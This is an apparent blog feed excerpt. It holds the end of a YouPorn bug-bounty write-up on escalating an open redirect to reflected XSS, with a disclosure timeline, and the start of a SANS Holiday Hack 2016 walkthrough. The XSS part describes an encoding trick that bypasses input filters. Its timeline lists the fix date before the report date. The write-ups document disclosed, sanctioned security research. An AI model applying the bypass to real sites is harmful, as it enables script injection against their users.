&lt;h2&gt;From open redirect to full reflective XSS&lt;/h2&gt;
&lt;p&gt;So that was it, somebody had already reported the vulnerability. However,
YouPorn had kindly decided to let the report open, so that we could find a
working payload, and we already had one with the open redirect payload.&lt;/p&gt;
&lt;p&gt;But then I thought &amp;quot;Wait a second, maybe I can use the same trick to put
&lt;code&gt;&amp;gt;&lt;/code&gt; and &lt;code&gt;&amp;lt;&lt;/code&gt; instead of a dash!&amp;quot;&lt;/p&gt;
&lt;p&gt;And indeed, it worked. With the &amp;quot;HTML-encode-then-URL-encode&amp;quot; trick, we could
insert arbitrary Javascript:&lt;/p&gt;
&lt;img alt="second_success.png" class="align-center" src="/images/meet-beautiful-xss-in-your-area-a-youporn-bug-bounty-sfw/second_success.png" /&gt;
&lt;p&gt;Obligatory pop-up:&lt;/p&gt;
&lt;img alt="w00t.png" class="align-center" src="/images/meet-beautiful-xss-in-your-area-a-youporn-bug-bounty-sfw/w00t.png" /&gt;
&lt;p&gt;We continued to do some tests afterwards, and we found out something weird
about YouPorn's HTML rendering: no matter how many recursions of HTML-encoding
we did on our payloads, they were still fully decoded server-side. This means
that:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;&amp;amp;lt;&lt;/code&gt; became &lt;code&gt;&amp;lt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&amp;amp;amp;lt;&lt;/code&gt; also became &lt;code&gt;&amp;lt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&amp;amp;amp;amp;lt;&lt;/code&gt; &lt;strong&gt;also&lt;/strong&gt; became &lt;code&gt;&amp;lt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Weird behaviour, but very interesting to bypass some filters!&lt;/p&gt;
&lt;p&gt;Anyway, I still have to migrate my DNS servers.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="timeline-yyyy-mm-dd"&gt;
&lt;h2&gt;Timeline (YYYY-MM-DD)&lt;/h2&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;strong&gt;2017-02-06&lt;/strong&gt;: Report sent to YouPorn&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2017-02-06&lt;/strong&gt;: Response from YouPorn saying that this bug was already
reported, but that we could keep trying to find a working payload&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2017-02-06&lt;/strong&gt;: Working payload sent to YouPorn&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2017-02-06&lt;/strong&gt;: Report triaged&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2017-02-10&lt;/strong&gt;: Bounty paid, $250&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2017-02-03&lt;/strong&gt;: Bug fixed&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2017-03-04&lt;/strong&gt;: Request to disclose publicly the report&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2017-03-28&lt;/strong&gt;: Public disclosure of the &lt;a class="reference external" href="https://hackerone.com/reports/203974"&gt;report&lt;/a&gt;
granted&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
</content></entry><entry><title>SANS Christmas Challenge 2016</title><link href="https://allyourbase.utouch.fr/posts/2017/01/05/sans-christmas-challenge-2016/" rel="alternate"></link><published>2017-01-05T00:00:00+01:00</published><updated>2017-01-05T00:00:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2017-01-05:/posts/2017/01/05/sans-christmas-challenge-2016/</id><summary type="html">&lt;img alt="sans_christmas_challenge_2016_logo.png" class="align-center" src="/images/sans-christmas-challenge-2016/sans_christmas_challenge_2016_logo.png" /&gt;
&lt;p&gt;This blog is beginning to look a lot like being exclusively about SANS Christmas
Challenges write-ups. What can I say, they're so good! Anyway, let's roll for
the &lt;a class="reference external" href="https://holidayhackchallenge.com/2016/"&gt;2016 edition of this marvelous Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Everything starts again with the Dosis children. As they're reminiscing on
&lt;a class="reference external" href="https://allyourbase.utouch.fr/posts/2016/01/09/sans-christmas-challenge-2015/#sans-christmas-challenge-2015"&gt;last year's Christmas&lt;/a&gt;,
they …&lt;/p&gt;</summary><content type="html">&lt;img alt="sans_christmas_challenge_2016_logo.png" class="align-center" src="/images/sans-christmas-challenge-2016/sans_christmas_challenge_2016_logo.png" /&gt;
&lt;p&gt;This blog is beginning to look a lot like being exclusively about SANS Christmas
Challenges write-ups. What can I say, they're so good! Anyway, let's roll for
the &lt;a class="reference external" href="https://holidayhackchallenge.com/2016/"&gt;2016 edition of this marvelous Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Everything starts again with the Dosis children. As they're reminiscing on
&lt;a class="reference external" href="https://allyourbase.utouch.fr/posts/2016/01/09/sans-christmas-challenge-2015/#sans-christmas-challenge-2015"&gt;last year's Christmas&lt;/a&gt;,
they hear Santa Claus landing on their roof, getting down the chimney, and
starting leaving presents in their living room. Then, suddenly, they hear
fighting sounds from downstairs. When they get down, everything is destroyed,
as if people had been fighting. But no trace of Santa Claus, only a business
card, which we can find in &lt;a class="reference external" href="https://quest2016.holidayhackchallenge.com/"&gt;the Dosis' living room&lt;/a&gt;...&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference internal" href="#part-1-a-most-curious-business-card" id="id1"&gt;Part 1: A Most Curious Business Card&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#part-2-awesome-package-konveyance" id="id2"&gt;Part 2: Awesome Package Konveyance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#part-3-a-fresh-baked-holiday-pi" id="id3"&gt;Part 3: A Fresh-Baked Holiday Pi&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#elf-house-2" id="id4"&gt;Elf House #2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#workshop-first-door" id="id5"&gt;Workshop, first door&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#santa-s-office" id="id6"&gt;Santa's office&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-corridor" id="id7"&gt;The corridor&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#workshop-second-door" id="id8"&gt;Workshop, second door&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#train-station" id="id9"&gt;Train station&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#part-4-my-gosh-it-s-full-of-holes" id="id10"&gt;Part 4: My Gosh... It's Full of Holes&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-mobile-analytics-server-via-credentialed-login-access" id="id11"&gt;The Mobile Analytics Server (via credentialed login access)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-dungeon-game" id="id12"&gt;The Dungeon Game&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-debug-server" id="id13"&gt;The Debug Server&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-banner-ad-server" id="id14"&gt;The Banner Ad Server&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-uncaught-exception-handler-server" id="id15"&gt;The Uncaught Exception Handler Server&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-mobile-analytics-server-post-authentication" id="id16"&gt;The Mobile Analytics Server (post authentication)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#part-5-discombobulated-audio" id="id17"&gt;Part 5: Discombobulated Audio&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#epilogue-bringing-it-all-home" id="id18"&gt;Epilogue: Bringing It All Home&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#conclusion" id="id19"&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="part-1-a-most-curious-business-card"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id1"&gt;Part 1: A Most Curious Business Card&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;In the Dosis' living room, we find the business card of a certain Santa W.
Claus:&lt;/p&gt;
&lt;img alt="santa_business_card.png" class="align-center" src="/images/sans-christmas-challenge-2016/santa_business_card.png" /&gt;
&lt;p&gt;We now have Santa's &lt;a class="reference external" href="https://twitter.com/santawclaus"&gt;Twitter&lt;/a&gt; an
&lt;a class="reference external" href="https://www.instagram.com/santawclaus/"&gt;Instagram&lt;/a&gt;  accounts. We also see
that Santa has left his present bag behind. By going to it, we can see that
it's in fact a portal to the North Pole. Here, we can ask around for
information on Santa to his elves. We learn that they're running a bug bounty
program called SantaGram. To participate into this bug bounty program, we must
find the Android application.&lt;/p&gt;
&lt;p&gt;By talking to Pepper Minstix, we get a &lt;a class="reference external" href="https://www.northpolewonderland.com/dungeon.zip"&gt;link&lt;/a&gt;
to a copy of the &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Dungeon_%28video_game%29"&gt;Dungeon&lt;/a&gt;
video game. We now know what servers the elves are using to exchange files.
Let's see if we can find a copy of SantaGram on this server.&lt;/p&gt;
&lt;p&gt;If we look back at Santa's &lt;a class="reference external" href="https://www.instagram.com/santawclaus/"&gt;Instagram account&lt;/a&gt;,
we can see a &lt;a class="reference external" href="https://www.instagram.com/p/BNpA2kEBF85/"&gt;photo of one of the elves' desktop&lt;/a&gt;.
If we zoom in, we can see that this elf was building a copy of the coveted
SantaGram Android application:&lt;/p&gt;
&lt;img alt="instagram_elf_desktop.jpg" class="align-center" src="/images/sans-christmas-challenge-2016/instagram_elf_desktop.jpg" /&gt;
&lt;p&gt;With the name of the ZIP archive on the screenshot, we can download the
SantaGram application at this &lt;a class="reference external" href="https://www.northpolewonderland.com/SantaGram_v4.2.zip"&gt;URL&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;You can download the ZIP file &lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/SantaGram_v4.2.zip"&gt;here&lt;/a&gt; (sha256: &lt;code&gt;51c3d144ffb25d06316bdd309a5e8a24cadb7592aace91036bd61f2f0c7440e5&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;Unfortunately, the archive is password protected:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; unzip SantaGram_v4.2.zip
&lt;span class="go"&gt;Archive:  SantaGram_v4.2.zip&lt;/span&gt;
&lt;span class="go"&gt;[SantaGram_v4.2.zip] SantaGram_4.2.apk password:&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's take a look at &lt;a class="reference external" href="https://twitter.com/santawclaus"&gt;Santa's tweets&lt;/a&gt;, to
see if we can find a clue:&lt;/p&gt;
&lt;img alt="santa_twitter.png" class="align-center" src="/images/sans-christmas-challenge-2016/santa_twitter.png" /&gt;
&lt;p&gt;Hmm, just a bunch of nonsense. Or is it? If we get the content of every tweet,
and paste them in a text file, we get the following string:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
SANTAELFHOHOHOCHRISTMASSANTACHRISTMASPEACEONEARTHCHRISTMASELFSANTAELFHOHOHO
GOODWILLTOWARDSMENSANTAPEACEONEARTHHOHOHOJOYSANTAGOODWILLTOWARDSMENJOYJOYQQ
GOODWILLTOWARDSMENGOODWILLTOWARDSMENJOYHOHOHOJOYELFELFPEACEONEARTHJOYHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASCHRISTMASPEACEONEARTHNORTHPOLEHOHOHOELFELFQ
JOYNORTHPOLECHRISTMASPEACEONEARTHNORTHPOLEJOYGOODWILLTOWARDSMENELFCHRISTMAS
CHRISTMASGOODWILLTOWARDSMENELFHOHOHOCHRISTMASPEACEONEARTHPEACEONEARTHJOYELF
HOHOHOGOODWILLTOWARDSMENNORTHPOLEGOODWILLTOWARDSMENSANTAPEACEONEARTHELFELFQ
GOODWILLTOWARDSMENP???????????????????????????????4CHRISTMASJOYELFELFSANTAQ
NORTHPOLEHOHOHOELFf...............................]PEACEONEARTHHOHOHOSANTAQ
SANTASANTAJOYELFQQf...............................]PEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYf...............................]HOHOHOSANTAHOHOHOELFJOYQ
SANTASANTAJOYJOYQQf...............................]GOODWILLTOWARDSMENHOHOHO
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOSANTAQ
NORTHPOLECHRISTMASf...............................]PEACEONEARTHCHRISTMASJOY
PEACEONEARTHSANTAQf...............................]PEACEONEARTHNORTHPOLEELF
JOYCHRISTMASSANTAQf...............................]CHRISTMASHOHOHOCHRISTMAS
NORTHPOLEHOHOHOJOYf...............................]PEACEONEARTHPEACEONEARTH
SANTAELFELFJOYJOYQf.......aaaaaa/....._aaaaa......]PEACEONEARTHNORTHPOLEELF
GOODWILLTOWARDSMENf.......QQWQWQf.....]ELFWQ......]HOHOHOHOHOHOCHRISTMASJOY
NORTHPOLESANTAJOYQf.......HOHOHOf.....]JOYQQ......]CHRISTMASCHRISTMASHOHOHO
NORTHPOLEELFJOYJOYf.......SANTAQf.....]JOYQQ......]NORTHPOLEPEACEONEARTHELF
SANTAPEACEONEARTHQf.......HOHOHOf.....]SANTA......]PEACEONEARTHCHRISTMASELF
ELFSANTASANTAJOYQQf.......HOHOHOf.....]JOYQW......]CHRISTMASPEACEONEARTHJOY
JOYHOHOHONORTHPOLEf.......SANTAQ[.....)ELFQE......]PEACEONEARTHPEACEONEARTH
HOHOHOCHRISTMASJOYf.......$WJOYQ(......$WQQ(......]GOODWILLTOWARDSMENSANTAQ
JOYPEACEONEARTHELFf.......)JOYQ&amp;#64;........??'.......]SANTAPEACEONEARTHHOHOHOQ
JOYJOYPEACEONEARTHL........?$QV'..................]CHRISTMASJOYNORTHPOLEJOY
SANTAJOYCHRISTMASQk...............................jGOODWILLTOWARDSMENJOYJOY
GOODWILLTOWARDSMENW...............................jJOYNORTHPOLEJOYELFSANTAQ
HOHOHOSANTAJOYELFQQ...............................GOODWILLTOWARDSMENHOHOHOQ
CHRISTMASSANTASANTA;................;............=JOYNORTHPOLEPEACEONEARTHQ
GOODWILLTOWARDSMENQL...............)L............jHOHOHOHOHOHOCHRISTMASELFQ
CHRISTMASHOHOHOELFQQ...............dQ,..........&amp;lt;GOODWILLTOWARDSMENHOHOHOQQ
GOODWILLTOWARDSMENQQL.............&amp;lt;QQm,........_HOHOHOHOHOHOCHRISTMASELFELF
SANTACHRISTMASELFELFQc..........._mJOYQc......aPEACEONEARTHCHRISTMASSANTAQQ
CHRISTMASPEACEONEARTHQw........._mSANTAWmwaawGOODWILLTOWARDSMENSANTAJOYELFQ
PEACEONEARTHELFSANTAELFQw,,..__yHOHOHOELFQWQQWGOODWILLTOWARDSMENHOHOHOSANTA
ELFHOHOHONORTHPOLEELFJOYWGOODWILLTOWARDSMENCHRISTMASSANTACHRISTMASJOYSANTAQ
ELFELFHOHOHOHOHOHOHOHOHONORTHPOLEJOYHOHOHOGOODWILLTOWARDSMENELFELFELFSANTAQ
ELFHOHOHOJOYPEACEONEARTHPEACEONEARTHJOYGOODWILLTOWARDSMENJOYELFPEACEONEARTH
GOODWILLTOWARDSMENJOYGOODWILLTOWARDSMENGOODWILLTOWARDSMENSANTAELFJOYJOYJOYQ
ELFSANTAPEACEONEARTHJOYJOYQQDT????????????????????4NORTHPOLEPEACEONEARTHELF
NORTHPOLENORTHPOLESANTAQWT^.......................]NORTHPOLEELFHOHOHOJOYELF
HOHOHOHOHOHOCHRISTMASQQP`.........................]JOYGOODWILLTOWARDSMENELF
ELFPEACEONEARTHSANTAQQ(...........................]HOHOHOSANTACHRISTMASJOYQ
JOYJOYCHRISTMASELFJOY(............................]GOODWILLTOWARDSMENHOHOHO
CHRISTMASELFELFELFQQf.............................]HOHOHONORTHPOLEJOYELFJOY
SANTACHRISTMASJOYQQD..............................]HOHOHOHOHOHOSANTASANTAQQ
HOHOHOELFSANTAELFQQ(..............................]GOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMENW...............................]NORTHPOLEHOHOHOHOHOHOJOY
CHRISTMASHOHOHOJOYF...............................]GOODWILLTOWARDSMENSANTAQ
CHRISTMASCHRISTMAS[.........._aaaaaaaaaaaaaaaaaaaajPEACEONEARTHELFNORTHPOLE
SANTANORTHPOLEELFQ(........jJOYQWQWWQWWQWWWWWWWWWGOODWILLTOWARDSMENHOHOHOQQ
ELFPEACEONEARTHELF;.......jWWSANTAGOODWILLTOWARDSMENSANTAGOODWILLTOWARDSMEN
ELFJOYNORTHPOLEJOY`.......QWGOODWILLTOWARDSMENGOODWILLTOWARDSMENCHRISTMASQQ
PEACEONEARTHJOYELF.......]WPEACEONEARTHCHRISTMASNORTHPOLEPEACEONEARTHHOHOHO
CHRISTMASJOYHOHOHO.......]HOHOHOELFGOODWILLTOWARDSMENPEACEONEARTHCHRISTMASQ
JOYCHRISTMASJOYELF.......]PEACEONEARTHCHRISTMASGOODWILLTOWARDSMENELFHOHOHOQ
JOYPEACEONEARTHJOY.......)WGOODWILLTOWARDSMENSANTANORTHPOLEJOYPEACEONEARTHQ
CHRISTMASHOHOHOELF........$WPEACEONEARTHNORTHPOLESANTAPEACEONEARTHSANTAJOYQ
JOYHOHOHOELFELFJOY;.......-QWCHRISTMASGOODWILLTOWARDSMENPEACEONEARTHJOYELFQ
HOHOHOCHRISTMASJOY(........-?$QWJOYCHRISTMASSANTACHRISTMASCHRISTMASHOHOHOQQ
ELFJOYELFCHRISTMASf...............................]PEACEONEARTHNORTHPOLEJOY
ELFHOHOHOSANTAELFQh...............................]GOODWILLTOWARDSMENHOHOHO
SANTACHRISTMASELFQQ,..............................]PEACEONEARTHPEACEONEARTH
GOODWILLTOWARDSMENQL..............................]HOHOHOELFCHRISTMASSANTAQ
GOODWILLTOWARDSMENQQ,.............................]PEACEONEARTHELFHOHOHOJOY
NORTHPOLESANTAHOHOHOm.............................]HOHOHOGOODWILLTOWARDSMEN
PEACEONEARTHCHRISTMASg............................]ELFHOHOHOSANTANORTHPOLEQ
NORTHPOLECHRISTMASJOYQm,..........................]NORTHPOLECHRISTMASSANTAQ
SANTASANTACHRISTMASSANTAw,........................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWQga,,....................]PEACEONEARTHPEACEONEARTH
PEACEONEARTHJOYCHRISTMASELFWCHRISTMASGOODWILLTOWARDSMENJOYPEACEONEARTHSANTA
PEACEONEARTHPEACEONEARTHCHRISTMASJOYSANTAPEACEONEARTHCHRISTMASELFHOHOHOELFQ
GOODWILLTOWARDSMENNORTHPOLECHRISTMASPEACEONEARTHHOHOHOELFJOYNORTHPOLEELFELF
JOYGOODWILLTOWARDSMENSANTACHRISTMASJOYPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOQ
HOHOHOCHRISTMASHOHOHOSANTANORTHPOLEPEACEONEARTHJOYPEACEONEARTHJOYJOYHOHOHOQ
JOYELFGOODWILLTOWARDSMENSANTAQBTT???TT$SANTASANTAPEACEONEARTHNORTHPOLEJOYQQ
SANTACHRISTMASCHRISTMASJOYWP&amp;quot;`.........-&amp;quot;9NORTHPOLEPEACEONEARTHCHRISTMASELF
SANTAELFELFELFSANTAJOYQQWP`...............-4JOYSANTANORTHPOLEJOYSANTASANTAQ
ELFELFELFHOHOHOHOHOHOQQ&amp;#64;'...................&amp;quot;$CHRISTMASELFSANTANORTHPOLEELF
ELFCHRISTMASSANTAELFQQP`.....................-$WELFWPEACEONEARTHSANTASANTAQ
SANTANORTHPOLEJOYELFQE........................-$SANTAELFWGOODWILLTOWARDSMEN
NORTHPOLEELFELFELFQQ&amp;#64;`.........................-QWPEACEONEARTHPEACEONEARTHQ
PEACEONEARTHJOYJOYQQ(...........................]CHRISTMASHOHOHOELFSANTAJOY
HOHOHOCHRISTMASELFQP.............................$NORTHPOLEJOYQWJOYWJOYWELF
SANTACHRISTMASJOYQQ(.............................]WSANTAWPEACEONEARTHJOYELF
HOHOHOSANTAJOYELFQW............_aaaas,............QWCHRISTMASQWHOHOHOSANTAQ
SANTAPEACEONEARTHQf........._wELFWWWWQQw,.........3ELFHOHOHOJOYJOYSANTAELFQ
CHRISTMASSANTAELFQ[........&amp;lt;HOHOHOELFELFQc........]CHRISTMASPEACEONEARTHELF
CHRISTMASCHRISTMAS(......._PEACEONEARTHJOY/.......)NORTHPOLESANTAELFQWELFWQ
PEACEONEARTHSANTAQ`.......dNORTHPOLEHOHOHOm.......:NORTHPOLEWCHRISTMASJOYQQ
PEACEONEARTHELFELF........SANTANORTHPOLEJOY;.......SANTASANTAJOYQWSANTAJOYQ
PEACEONEARTHSANTAQ.......]ELFSANTAJOYJOYELF[.......GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMEN.......]ELFNORTHPOLEJOYQQf.......ELFSANTAJOYHOHOHOQQWELFQ
GOODWILLTOWARDSMEN.......]ELF.......]JOYELF[.......PEACEONEARTHPEACEONEARTH
HOHOHOJOYNORTHPOLE.......]JOY.......]SANTAQ'.......SANTASANTAQQWNORTHPOLEQQ
CHRISTMASNORTHPOLE:......)WQQ.......]SANTAD........NORTHPOLESANTAELFWELFJOY
ELFCHRISTMASSANTAQ;......-JOY.......]ELFQW'.......:PEACEONEARTHCHRISTMASJOY
CHRISTMASSANTAELFQ[.......WQQ.......]ELFD'........=HOHOHOGOODWILLTOWARDSMEN
ELFELFSANTAJOYELFQL.......]QQ.......]ELF..........]PEACEONEARTHQWCHRISTMASQ
NORTHPOLESANTAELFQm.......+QQ.......]ELF;.........jWNORTHPOLENORTHPOLEELFWQ
JOYELFHOHOHOSANTAQQ.................]JOY[.........mCHRISTMASCHRISTMASQQWELF
NORTHPOLENORTHPOLEQ[................]JOYL........_PEACEONEARTHSANTASANTAELF
SANTANORTHPOLEJOYQQm................]ELFk........dHOHOHOPEACEONEARTHQQWJOYQ
PEACEONEARTHHOHOHOQQc...............]JOYm.......]PEACEONEARTHHOHOHOWHOHOHOQ
CHRISTMASHOHOHOJOYQQm...............]ELFQ......_GOODWILLTOWARDSMENNORTHPOLE
JOYELFNORTHPOLEJOYELFL..............]JOYQ;....&amp;lt;SANTAHOHOHONORTHPOLEELFSANTA
PEACEONEARTHELFHOHOHOQ,.............]JOYQ[...wPEACEONEARTHELFSANTAWHOHOHOQQ
CHRISTMASELFELFELFJOYQ6.............]ELFQL_wPEACEONEARTHHOHOHOCHRISTMASELFQ
HOHOHOJOYNORTHPOLEQWELFwaaaaaaaaaaaajPEACEONEARTHGOODWILLTOWARDSMENSANTAQWQ
CHRISTMASELFPEACEONEARTHWWWQWWQWWWWELFELFSANTANORTHPOLESANTAELFQQWJOYHOHOHO
CHRISTMASNORTHPOLEHOHOHOHOHOHOCHRISTMASGOODWILLTOWARDSMENNORTHPOLEHOHOHOWQQ
GOODWILLTOWARDSMENNORTHPOLENORTHPOLESANTANORTHPOLEJOYSANTAELFELFWCHRISTMASQ
GOODWILLTOWARDSMENHOHOHOHOHOHONORTHPOLEELFSANTAELFNORTHPOLEPEACEONEARTHELFQ
PEACEONEARTHELFELFQWPEACEONEARTHPEACEONEARTHHOHOHOPEACEONEARTHWNORTHPOLEWQQ
ELFPEACEONEARTHCHRISTMASELFPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENSANTAQ
SANTASANTASANTAJOYELFJOYWGOODWILLTOWARDSMENPEACEONEARTHSANTAWPEACEONEARTHQQ
PEACEONEARTHSANTAJOYGOODWILLTOWARDSMENSANTACHRISTMASELFCHRISTMASELFJOYQWELF
CHRISTMASCHRISTMASELFELFHOHOHOWJOYWNORTHPOLESANTACHRISTMASWSANTAJOYQQWJOYQQ
ELFJOYSANTAJOYJOYQQWJOYWPEACEONEARTHNORTHPOLEHOHOHOHOHOHONORTHPOLEELFJOYELF
ELFNORTHPOLEJOYSANTANORTHPOLECHRISTMASQQWPEACEONEARTHJOYQWHOHOHOJOYWJOYELFQ
NORTHPOLECHRISTMASHOHOHOSANTAWPEACEONEARTHGOODWILLTOWARDSMENCHRISTMASHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASSANTAQQWELFHOHOHOSANTAQQWJOYSANTAQWSANTAJOY
JOYNORTHPOLEJOYPEACEONEARTHWELFELFQQWNORTHPOLEQWHOHOHONORTHPOLEELFELFHOHOHO
CHRISTMASSANTASANTAWJOYWCHRISTMASHOHOHONORTHPOLEJOYQQWHOHOHOSANTAWNORTHPOLE
PEACEONEARTHSANTASANTAPEACEONEARTHNORTHPOLEJOYJOYJOYELFCHRISTMASHOHOHOSANTA
SANTASANTACHRISTMASJOYJOYJOYELFJOYQWHOHOHOJOYQWPEACEONEARTHELFQQWCHRISTMASQ
GOODWILLTOWARDSMENELFPEACEONEARTHHOHOHOCHRISTMASELFQWHOHOHOWCHRISTMASHOHOHO
CHRISTMASELFELFPEACEONEARTHWELFQQWHOHOHOQQWCHRISTMASELFJOYNORTHPOLEHOHOHOQQ
SANTAPEACEONEARTHQQWJOYWCHRISTMASHOHOHOPEACEONEARTHGOODWILLTOWARDSMENJOYQWQ
JOYJOYHOHOHOELFELFP???????????????????????????????4SANTAQQWPEACEONEARTHELFQ
NORTHPOLENORTHPOLEf...............................]PEACEONEARTHQQWHOHOHOWQQ
CHRISTMASJOYHOHOHOf...............................]ELFGOODWILLTOWARDSMENELF
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOQQWELF
NORTHPOLEHOHOHOELFf...............................]CHRISTMASJOYQWSANTASANTA
SANTAJOYNORTHPOLEQf...............................]SANTAHOHOHOWJOYCHRISTMAS
GOODWILLTOWARDSMENf...............................]PEACEONEARTHHOHOHOQWJOYQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENHOHOHO
JOYCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENf...............................]NORTHPOLEPEACEONEARTHJOY
ELFSANTAHOHOHOELFQf.......aaaaaa/....._aaaaa......]GOODWILLTOWARDSMENWELFQQ
NORTHPOLEHOHOHOELFf.......QWWWWQf.....]QQWWQ......]HOHOHOHOHOHOQQWJOYSANTAQ
SANTANORTHPOLEJOYQf.......HOHOHOf.....]JOYQQ......]HOHOHOHOHOHONORTHPOLEELF
NORTHPOLEJOYJOYELFf.......JOYELFf.....]SANTA......]NORTHPOLEHOHOHONORTHPOLE
SANTASANTASANTAELFf.......JOYELFf.....]SANTA......]NORTHPOLENORTHPOLEELFELF
GOODWILLTOWARDSMENf.......JOYJOYf.....]JOYQW......]PEACEONEARTHHOHOHOQWELFQ
GOODWILLTOWARDSMENf.......HOHOHO[.....)JOYQE......]HOHOHOELFHOHOHOQQWJOYJOY
JOYNORTHPOLEELFELFf.......$WELFQ(......$WQQ(......]PEACEONEARTHNORTHPOLEELF
NORTHPOLEJOYELFJOYf.......)ELFQ&amp;#64;........??'.......]CHRISTMASPEACEONEARTHJOY
SANTAPEACEONEARTHQL........?$QV'..................]HOHOHOGOODWILLTOWARDSMEN
JOYELFPEACEONEARTHk...............................jJOYSANTACHRISTMASWJOYJOY
SANTAPEACEONEARTHQW...............................jSANTAGOODWILLTOWARDSMENQ
CHRISTMASSANTAELFQQ...............................HOHOHOPEACEONEARTHSANTAQQ
ELFCHRISTMASELFELFQ;................;............=NORTHPOLENORTHPOLEJOYELFQ
NORTHPOLEJOYSANTAQQ[...............)L............jPEACEONEARTHJOYHOHOHOQQWQ
CHRISTMASHOHOHOJOYQm...............dQ,..........&amp;lt;GOODWILLTOWARDSMENQWSANTAQ
SANTACHRISTMASSANTAQL.............&amp;lt;QQm,........_JOYELFGOODWILLTOWARDSMENELF
HOHOHOSANTASANTAJOYQQc..........._mELFQc......aGOODWILLTOWARDSMENSANTAJOYWQ
CHRISTMASHOHOHOJOYJOYQw........._mELFQQWmwaawGOODWILLTOWARDSMENNORTHPOLEELF
NORTHPOLEELFPEACEONEARTHw,,..__yELFJOYJOYQWQWQWGOODWILLTOWARDSMENCHRISTMASQ
JOYNORTHPOLEELFNORTHPOLEWGOODWILLTOWARDSMENNORTHPOLEJOYJOYJOYSANTAQQWELFWQQ
JOYSANTAELFHOHOHOQQWNORTHPOLENORTHPOLEGOODWILLTOWARDSMENSANTASANTAHOHOHOJOY
ELFHOHOHOCHRISTMASCHRISTMASELFPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOELFJOYELF
JOYPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENHOHOHONORTHPOLEHOHOHOELFELFJOY
HOHOHOPEACEONEARTHELFJOYJOYQV?&amp;quot;~....--&amp;quot;?$CHRISTMASELFWPEACEONEARTHQWHOHOHOQ
CHRISTMASCHRISTMASJOYELFWW?`.............-?CHRISTMASHOHOHOQWELFWSANTAJOYWQQ
SANTAPEACEONEARTHQQWELFQP`.................-4HOHOHOWCHRISTMASNORTHPOLESANTA
CHRISTMASNORTHPOLEJOYQW(.....................)WGOODWILLTOWARDSMENNORTHPOLEQ
